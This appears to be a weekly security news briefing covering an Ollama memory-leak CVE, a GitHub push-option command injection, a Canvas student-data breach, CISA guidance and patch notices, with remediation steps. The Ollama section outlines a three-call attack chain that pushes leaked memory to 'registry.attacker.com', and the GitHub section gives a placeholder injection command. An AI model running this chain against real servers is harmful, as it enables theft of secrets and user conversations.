Security Roundup: Bleeding Llama, GitHub RCE, 275M Student Records Stolen — Week of May 7, 2026
Weekly briefing: Bleeding Llama Ollama memory leak, GitHub single-push RCE, 275M Canvas student records breach, and CISA CI Fortify.
A busy week in security. AI infrastructure is the new attack surface, GitHub's core git pipeline had a critical RCE for months before disclosure, 275 million students' data was lifted from a learning management system, and CISA is back from its longest-ever shutdown with new crisis planning guidance. Here is what you need to know.
Bleeding Llama: Critical Unauthenticated RCE in Ollama (CVE-2026-7482, CVSS 9.3)
If you are running Ollama and it is reachable from the internet, stop reading and go patch. Cyera Research disclosed CVE-2026-7482 — dubbed Bleeding Llama — on May 5, 2026, affecting all Ollama versions before 0.17.1. Roughly 300,000 internet-facing deployments are estimated to be vulnerable.
The vulnerability lives in Ollama's GGUF model loader. When the server processes a GGUF file where the declared tensor offset and size exceed the file's actual length, functions in fs/ggml/gguf.go and server/quantization.go read past the allocated heap buffer during quantization. The leaked memory can contain environment variables, API keys, system prompts from other loaded models, and concurrent user conversation data.
What makes this particularly nasty is the exfiltration path. The full attack chain requires only three unauthenticated API calls:
# Step 1: Upload a malicious GGUF blob with mismatched tensor metadata
POST /api/blobs/sha256:<hash>
# Step 2: Create a model — triggers quantization and heap overread
POST /api/create
# Step 3: Push the now-tainted model to attacker-controlled registry
POST /api/push
{"name": "registry.attacker.com/leaked-model"}Because the F16 to F32 conversion path is lossless, every leaked byte is preserved intact inside the resulting model file and then exfiltrated via /api/push to an attacker-controlled registry. Ollama logs no errors, the server does not crash, and detection requires dedicated monitoring of the /api/create and /api/push endpoints.
The patch shipped in Ollama 0.17.1 on February 25 — but the release notes did not flag it as a security fix, so many operators never realized they needed to upgrade. The CVE itself was only assigned on April 28 after MITRE ignored a March 2 request and Cyera escalated to Echo CNA. That three-month gap between patch and CVE assignment meant the vulnerability was invisible to scanners and feeds the entire time.
What to do
Upgrade to Ollama 0.17.1 or later immediately. Bind Ollama to 127.0.0.1 — never OLLAMA_HOST=0.0.0.0 in production. Place a reverse proxy with authentication in front (Cloudflare Access, an OAuth proxy, or Tailscale). Rotate all secrets on any instance that has been publicly accessible. Review /api/create and /api/push logs for unexpected external registry targets.
GitHub CVE-2026-3854: RCE via a Single Git Push (CVSS 8.7)
Wiz Research discovered a command injection vulnerability in GitHub's internal git infrastructure on March 4, 2026. GitHub deployed a fix to GitHub.com within two hours of being notified. Public disclosure came on April 28.
The root cause: during a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. GitHub's internal infrastructure is a multi-service pipeline written in multiple languages, and the delimiter character used in the internal header format could also appear in attacker-controlled push option values. By crafting push options containing the delimiter, an authenticated attacker with repository push access could inject additional metadata fields — and achieve remote code execution on GitHub's backend storage nodes.
# Proof-of-concept — any authenticated user with push access
git push origin main -o <injected-push-option-with-delimiter>Notably, Wiz identified this flaw in closed-source binaries using AI-assisted analysis — one of the first publicly documented critical vulnerabilities found this way. The vulnerability affected GitHub.com, GitHub Enterprise Cloud, and GitHub Enterprise Server. GHES users should upgrade to version 3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later.
If you are running GitHub Enterprise Server and have not patched, do it now. GitHub.com was patched the same day Wiz reported it.
Instructure Canvas Breach: 275 Million Students' Data Stolen
ShinyHunters claims to have stolen personal data for approximately 275 million users from Instructure's Canvas learning management platform. The breach occurred around April 25, 2026, and affected school districts across North Carolina and potentially nationwide — Canvas is used by nearly all US K-12 public schools following a 2015 agreement with the North Carolina Department of Public Instruction.
Compromised data includes names, email addresses, student IDs, and user communications. No passwords, birth dates, government identifiers, or financial data were involved according to Instructure's initial disclosure. Bitwarden confirmed separately that the Instructure breach was linked to the ongoing Checkmarx supply chain campaign — the same audit.checkmarx.cx C2 endpoint appeared in both incidents.
The education sector continues to be a high-value, low-resistance target. Limited security budgets, mixed device environments, millions of minors' PII, and heavy reliance on third-party SaaS create exactly the conditions attackers look for. The stolen data is immediately useful for highly convincing phishing campaigns that reference real school names, teachers, and course names.
If you are an administrator
Force a password reset for all affected accounts. Enable MFA on all staff and parent-accessible portals. Brief staff on phishing campaigns that may reference Canvas or course-specific details. Monitor for follow-on credential stuffing against SSO providers and Google/Microsoft education accounts.
CISA Launches CI Fortify After Longest-Ever Shutdown
CISA is back. After the longest government shutdown in US history — during which the agency shed staff and paused hiring — it has launched CI Fortify, a new initiative pushing critical infrastructure organizations to plan for cybersecurity emergencies including scenarios where internet, telecommunications, and technology services are severed entirely.
The guidance focuses on two primary objectives: isolation (operating securely with no external connectivity) and recovery (restoring operations after a geopolitically motivated cyberattack). CISA is prioritizing defense critical infrastructure — dams, radar systems, weapon systems, satellite communications, and related facilities — and has already begun a pilot assessment program against unnamed organizations.
The timing is notable. CISA is simultaneously emphasizing OT (operational technology) resilience following April guidance on zero-trust adoption in OT systems, and the agency has now explicitly named geopolitical crisis scenarios as the threat model rather than the more generic cybercriminal framing of previous guidance.
Also Worth Watching This Week
Android CVE-2026-0073: A critical remote code execution vulnerability in Android's System component, exploitable without any user interaction. Google patched it in the May security bulletin. Update your devices.
cPanel CVE-2026-41940: Active exploitation of a critical authentication bypass in the Captive Portal service of cPanel. If you manage web hosting infrastructure running cPanel, patch immediately — exploitation has been observed in the wild.
Weaver E-cology CVE-2026-22679: Unauthenticated remote command execution through an exposed debug API, actively exploited since March 2026. Appears to be targeting enterprise workflow systems.
Copy Fail CVE-2026-31431: A local privilege escalation vulnerability on Linux being actively abused to gain root. Check your kernel version and patch.
MOVEit Automation: Progress patched a critical authentication bypass. Given the history of MOVEit exploitation, treat this as urgent regardless of your internal patch cadence.
Cisco acquires Astrix Security (~$400M): Astrix focuses on securing non-human identities — API keys, service accounts, and OAuth tokens used by applications and AI agents. The acquisition reflects where enterprise security spend is heading as agentic AI proliferates.
Mandiant M-Trends 2026: Time-to-exploit has effectively gone negative — 28.3% of CVEs are now being exploited within 24 hours of disclosure. Mean time from patch to exploit is now 44 days, down from 700 days in 2020.
The Pattern
Three of this week's top stories — Bleeding Llama, the Instructure breach, and the continued Checkmarx/TeamPCP fallout — share a common thread: organizations are running trusted infrastructure with no visibility into what it is actually doing, no authentication on internal APIs, and no monitoring for anomalous egress. The threat model has not changed. The urgency of implementing basic hygiene has.
Patch your Ollama instances. Update GitHub Enterprise Server. Enable MFA everywhere. Monitor your egress.
Deep Dives
Each story this week has a dedicated deep-dive article with technical details, attack chains, and full remediation guidance:
CVE-2026-7482: Bleeding Llama — Critical Unauthenticated Memory Leak in Ollama
CVE-2026-3854: GitHub RCE via a Single Git Push
Instructure Canvas Breach: 275 Million Students' Data Stolen, Linked to TeamPCP Campaign
CISA CI Fortify: Planning for Cyber Emergencies When Connectivity Itself Is the Target
Patch Now: Android RCE, cPanel Auth Bypass, MOVEit, Copy Fail LPE, and Weaver E-cology